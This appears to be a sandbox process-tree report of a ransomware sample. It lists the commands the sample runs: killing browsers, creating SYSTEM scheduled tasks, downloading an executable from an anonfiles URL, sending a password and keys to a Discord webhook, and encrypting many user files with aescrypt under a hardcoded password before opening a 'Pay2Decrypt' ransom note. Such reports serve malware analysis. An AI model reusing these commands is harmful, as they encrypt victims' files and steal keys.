powershell start -verb runas cmd.exe -ArgumentList "/c kill.bat" -filepath "C:\Users\Admin\AppData\Local\Temp" -WindowStyle hidden
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:992

C:\Windows\system32\taskkill.exe
taskkill /f /im opera.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\system32\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Windows\system32\taskkill.exe
taskkill /f /im firefox.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\system32\taskkill.exe
taskkill /f /im iexplore.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2152

C:\Windows\system32\schtasks.exe
schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe" /RU "SYSTEM" /f
3⤵
- Creates scheduled task(s)
PID:2568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe','C:\Users\Admin\AppData\Local\Temp\final.exe')
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572

C:\Windows\system32\schtasks.exe
schtasks /create /sc DAILY /tn UpdateWuaucltHelper /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\final.exe" /RU "SYSTEM" /MO 5
3⤵
- Creates scheduled task(s)
PID:204

C:\Users\Admin\AppData\Local\Temp\2754.tmp\DiscordSendWebhook.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\DiscordSendWebhook" -m ":satellite: LEAKGAP: Info from Admin, Password: mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu, FakeAccount: HPjUqt0Zobp8sM0YzACaWXGjN7A5XQIVztB, PersonalKey:||BAqQWM65otDWfLOyQXnL5gJo1XkRaoeKP81JVP||" -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -verb runas -FilePath "C:\Users\Admin\AppData\Local\Temp\final.exe" -WindowStyle hidden
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380

C:\Windows\system32\attrib.exe
attrib +r +s +h C:\Users\Admin\AppData\Local\Temp /s /D
3⤵
PID:4336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4356

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
3⤵
- Executes dropped EXE
PID:4324

C:\Windows\system32\attrib.exe
attrib +r "desktop.ini.lck"
3⤵
- Views/modifies file attributes
PID:3088

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RegisterOptimize.mpeg.lck" "RegisterOptimize.mpeg"
3⤵
- Executes dropped EXE
PID:2284

C:\Windows\system32\attrib.exe
attrib +r "RegisterOptimize.mpeg.lck"
3⤵
PID:2212

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SplitSelect.xltx.lck" "SplitSelect.xltx"
3⤵
- Executes dropped EXE
PID:5092

C:\Windows\system32\attrib.exe
attrib +r "SplitSelect.xltx.lck"
3⤵
- Views/modifies file attributes
PID:3916

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ExitConvert.dll.lck" "ExitConvert.dll"
3⤵
- Executes dropped EXE
PID:3920

C:\Windows\system32\attrib.exe
attrib +r "ExitConvert.dll.lck"
3⤵
- Views/modifies file attributes
PID:4252

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "GetSkip.mp2.lck" "GetSkip.mp2"
3⤵
- Executes dropped EXE
PID:3288

C:\Windows\system32\attrib.exe
attrib +r "GetSkip.mp2.lck"
3⤵
PID:284

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnblockConvertFrom.tmp.lck" "UnblockConvertFrom.tmp"
3⤵
- Executes dropped EXE
PID:4288

C:\Windows\system32\attrib.exe
attrib +r "UnblockConvertFrom.tmp.lck"
3⤵
- Views/modifies file attributes
PID:4260

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UninstallCompress.ADT.lck" "UninstallCompress.ADT"
3⤵
- Executes dropped EXE
PID:3148

C:\Windows\system32\attrib.exe
attrib +r "UninstallCompress.ADT.lck"
3⤵
PID:4068

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SuspendSync.vstm.lck" "SuspendSync.vstm"
3⤵
- Executes dropped EXE
PID:4072

C:\Windows\system32\attrib.exe
attrib +r "SuspendSync.vstm.lck"
3⤵
PID:4060

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SendReset.pdf.lck" "SendReset.pdf"
3⤵
- Executes dropped EXE
PID:5008

C:\Windows\system32\attrib.exe
attrib +r "SendReset.pdf.lck"
3⤵
PID:4444

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "DisconnectRemove.wmf.lck" "DisconnectRemove.wmf"
3⤵
- Executes dropped EXE
PID:4528

C:\Windows\system32\attrib.exe
attrib +r "DisconnectRemove.wmf.lck"
3⤵
PID:4504

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RenameSync.emz.lck" "RenameSync.emz"
3⤵
- Executes dropped EXE
PID:4584

C:\Windows\system32\attrib.exe
attrib +r "RenameSync.emz.lck"
3⤵
- Views/modifies file attributes
PID:4560

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SuspendCheckpoint.midi.lck" "SuspendCheckpoint.midi"
3⤵
- Executes dropped EXE
PID:4572

C:\Windows\system32\attrib.exe
attrib +r "SuspendCheckpoint.midi.lck"
3⤵
PID:604

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "JoinCompress.css.lck" "JoinCompress.css"
3⤵
- Executes dropped EXE
PID:4576

C:\Windows\system32\attrib.exe
attrib +r "JoinCompress.css.lck"
3⤵
PID:632

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SuspendGrant.dwfx.lck" "SuspendGrant.dwfx"
3⤵
- Executes dropped EXE
PID:1524

C:\Windows\system32\attrib.exe
attrib +r "SuspendGrant.dwfx.lck"
3⤵
- Views/modifies file attributes
PID:1180

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "DisconnectGroup.csv.lck" "DisconnectGroup.csv"
3⤵
- Executes dropped EXE
PID:1288

C:\Windows\system32\attrib.exe
attrib +r "DisconnectGroup.csv.lck"
3⤵
PID:1520

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RevokeFind.m1v.lck" "RevokeFind.m1v"
3⤵
- Executes dropped EXE
PID:1772

C:\Windows\system32\attrib.exe
attrib +r "RevokeFind.m1v.lck"
3⤵
- Views/modifies file attributes
PID:4372

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ReadMove.wmf.lck" "ReadMove.wmf"
3⤵
- Executes dropped EXE
PID:1816

C:\Windows\system32\attrib.exe
attrib +r "ReadMove.wmf.lck"
3⤵
PID:1828

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SetRestore.TTS.lck" "SetRestore.TTS"
3⤵
- Executes dropped EXE
PID:2384

C:\Windows\system32\attrib.exe
attrib +r "SetRestore.TTS.lck"
3⤵
PID:2564

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RedoLock.ppsx.lck" "RedoLock.ppsx"
3⤵
- Executes dropped EXE
PID:2604

C:\Windows\system32\attrib.exe
attrib +r "RedoLock.ppsx.lck"
3⤵
PID:4744

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RestartResume.M2V.lck" "RestartResume.M2V"
3⤵
- Executes dropped EXE
PID:2596

C:\Windows\system32\attrib.exe
attrib +r "RestartResume.M2V.lck"
3⤵
PID:4716

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConfirmComplete.eps.lck" "ConfirmComplete.eps"
3⤵
- Executes dropped EXE
PID:4708

C:\Windows\system32\attrib.exe
attrib +r "ConfirmComplete.eps.lck"
3⤵
- Views/modifies file attributes
PID:2496

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConvertCompare.mpeg.lck" "ConvertCompare.mpeg"
3⤵
- Executes dropped EXE
PID:4460

C:\Windows\system32\attrib.exe
attrib +r "ConvertCompare.mpeg.lck"
3⤵
PID:3268

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConfirmStep.lnk.lck" "ConfirmStep.lnk"
3⤵
- Executes dropped EXE
PID:4628

C:\Windows\system32\attrib.exe
attrib +r "ConfirmStep.lnk.lck"
3⤵
PID:4592

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "InvokeTest.lock.lck" "InvokeTest.lock"
3⤵
- Executes dropped EXE
PID:764

C:\Windows\system32\attrib.exe
attrib +r "InvokeTest.lock.lck"
3⤵
PID:752

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RegisterAdd.iso.lck" "RegisterAdd.iso"
3⤵
- Executes dropped EXE
PID:3960

C:\Windows\system32\attrib.exe
attrib +r "RegisterAdd.iso.lck"
3⤵
- Views/modifies file attributes
PID:3928

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RepairPop.avi.lck" "RepairPop.avi"
3⤵
- Executes dropped EXE
PID:3084

C:\Windows\system32\attrib.exe
attrib +r "RepairPop.avi.lck"
3⤵
- Views/modifies file attributes
PID:4700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:1376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe start-process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/k","call","C:\Users\Admin\Desktop\p2d.bat" -WorkingDirectory "C:\Users\Admin\Desktop" -WindowStyle hidden
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k call C:\Users\Admin\Desktop\p2d.bat
4⤵
- Modifies registry class
PID:3452

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt
5⤵
- Modifies registry class
- Opens file in notepad (likely ransom note)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4464

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
3⤵
- Executes dropped EXE
PID:4520

C:\Windows\system32\attrib.exe
attrib +r "ntuser.dat.LOG2.lck"
3⤵
- Views/modifies file attributes
PID:4620

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.ini.lck" "ntuser.ini"
3⤵
- Executes dropped EXE
PID:4484

C:\Windows\system32\attrib.exe
attrib +r "ntuser.ini.lck"
3⤵
PID:4552

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.lck" "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf"
3⤵
- Executes dropped EXE
PID:4632

C:\Windows\system32\attrib.exe
attrib +r "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.lck"
3⤵
- Views/modifies file attributes
PID:532

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG1.lck" "ntuser.dat.LOG1"
3⤵
- Executes dropped EXE
PID:604

C:\Windows\system32\attrib.exe
attrib +r "ntuser.dat.LOG1.lck"
3⤵
- Views/modifies file attributes
PID:528

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.lck" "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms"
3⤵
- Executes dropped EXE
PID:436

C:\Windows\system32\attrib.exe
attrib +r "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.lck"
3⤵
- Views/modifies file attributes
PID:1136

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.lck" "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms"
3⤵
- Executes dropped EXE
PID:632

C:\Windows\system32\attrib.exe
attrib +r "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.lck"
3⤵
- Views/modifies file attributes
PID:1096

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "NTUSER.DAT.lck" "NTUSER.DAT"
3⤵
- Executes dropped EXE
PID:1268

C:\Windows\system32\attrib.exe
attrib +r "NTUSER.DAT.lck"
3⤵
PID:1388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:4664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1784

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
- Executes dropped EXE
PID:1676

C:\Windows\system32\attrib.exe
attrib +r "90737d32e3aba4b.timestamp.lck"
3⤵
PID:1668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:8

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
3⤵
- Executes dropped EXE
PID:2160

C:\Windows\system32\attrib.exe
attrib +r "ntuser.dat.LOG2.lck"
3⤵
PID:2124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1548

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
3⤵
- Executes dropped EXE
PID:2304

C:\Windows\system32\attrib.exe
attrib +r "desktop.ini.lck"
3⤵
PID:2152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2820

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
3⤵
- Executes dropped EXE
PID:2500

C:\Windows\system32\attrib.exe
attrib +r "desktop.ini.lck"
3⤵
- Views/modifies file attributes
PID:2692

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "These.docx.lck" "These.docx"
3⤵
- Executes dropped EXE
PID:2856

C:\Windows\system32\attrib.exe
attrib +r "These.docx.lck"
3⤵
- Views/modifies file attributes
PID:4732

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Are.docx.lck" "Are.docx"
3⤵
- Executes dropped EXE
PID:4716

C:\Windows\system32\attrib.exe
attrib +r "Are.docx.lck"
3⤵
PID:2932

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Recently.docx.lck" "Recently.docx"
3⤵
- Executes dropped EXE
PID:2588

C:\Windows\system32\attrib.exe
attrib +r "Recently.docx.lck"
3⤵
- Views/modifies file attributes
PID:200

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Opened.docx.lck" "Opened.docx"
3⤵
- Executes dropped EXE
PID:4412

C:\Windows\system32\attrib.exe
attrib +r "Opened.docx.lck"
3⤵
- Views/modifies file attributes
PID:3268

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Files.docx.lck" "Files.docx"
3⤵
- Executes dropped EXE
PID:1364

C:\Windows\system32\attrib.exe
attrib +r "Files.docx.lck"
3⤵
PID:4456

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ShowInstall.vst.lck" "ShowInstall.vst"
3⤵
- Executes dropped EXE
PID:804

C:\Windows\system32\attrib.exe
attrib +r "ShowInstall.vst.lck"
3⤵
PID:752

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RenameLock.potm.lck" "RenameLock.potm"
3⤵
- Executes dropped EXE
PID:2296

C:\Windows\system32\attrib.exe
attrib +r "RenameLock.potm.lck"
3⤵
PID:3952

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConfirmClose.rtf.lck" "ConfirmClose.rtf"
3⤵
- Executes dropped EXE
PID:4684

C:\Windows\system32\attrib.exe
attrib +r "ConfirmClose.rtf.lck"
3⤵
PID:3392

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SetExpand.vdw.lck" "SetExpand.vdw"
3⤵
- Executes dropped EXE
PID:3664

C:\Windows\system32\attrib.exe
attrib +r "SetExpand.vdw.lck"
3⤵
PID:3104

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "StartOpen.docx.lck" "StartOpen.docx"
3⤵
- Executes dropped EXE
PID:4608

C:\Windows\system32\attrib.exe
attrib +r "StartOpen.docx.lck"
3⤵
- Views/modifies file attributes
PID:4928

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "LockBackup.xla.lck" "LockBackup.xla"
3⤵
- Executes dropped EXE
PID:3116

C:\Windows\system32\attrib.exe
attrib +r "LockBackup.xla.lck"
3⤵
PID:4376

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "AddPublish.xlsm.lck" "AddPublish.xlsm"
3⤵
- Executes dropped EXE
PID:2220

C:\Windows\system32\attrib.exe
attrib +r "AddPublish.xlsm.lck"
3⤵
- Views/modifies file attributes
PID:4596

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "MountGrant.potm.lck" "MountGrant.potm"
3⤵
- Executes dropped EXE
PID:2212

C:\Windows\system32\attrib.exe
attrib +r "MountGrant.potm.lck"
3⤵
PID:4836

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ResizeSave.vstm.lck" "ResizeSave.vstm"
3⤵
- Executes dropped EXE
PID:4796

C:\Windows\system32\attrib.exe
attrib +r "ResizeSave.vstm.lck"
3⤵
PID:276

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConfirmWait.pot.lck" "ConfirmWait.pot"
3⤵
- Executes dropped EXE
PID:272

C:\Windows\system32\attrib.exe
attrib +r "ConfirmWait.pot.lck"
3⤵
PID:4184

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "DisconnectOpen.mhtml.lck" "DisconnectOpen.mhtml"
3⤵
- Executes dropped EXE
PID:3568

C:\Windows\system32\attrib.exe
attrib +r "DisconnectOpen.mhtml.lck"
3⤵
- Views/modifies file attributes
PID:3340

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "HideSelect.pot.lck" "HideSelect.pot"
3⤵
- Executes dropped EXE
PID:280

C:\Windows\system32\attrib.exe
attrib +r "HideSelect.pot.lck"
3⤵
- Views/modifies file attributes
PID:3924

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnblockEnable.ppsx.lck" "UnblockEnable.ppsx"
3⤵
- Executes dropped EXE
PID:4268

C:\Windows\system32\attrib.exe
attrib +r "UnblockEnable.ppsx.lck"
3⤵
PID:3032

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
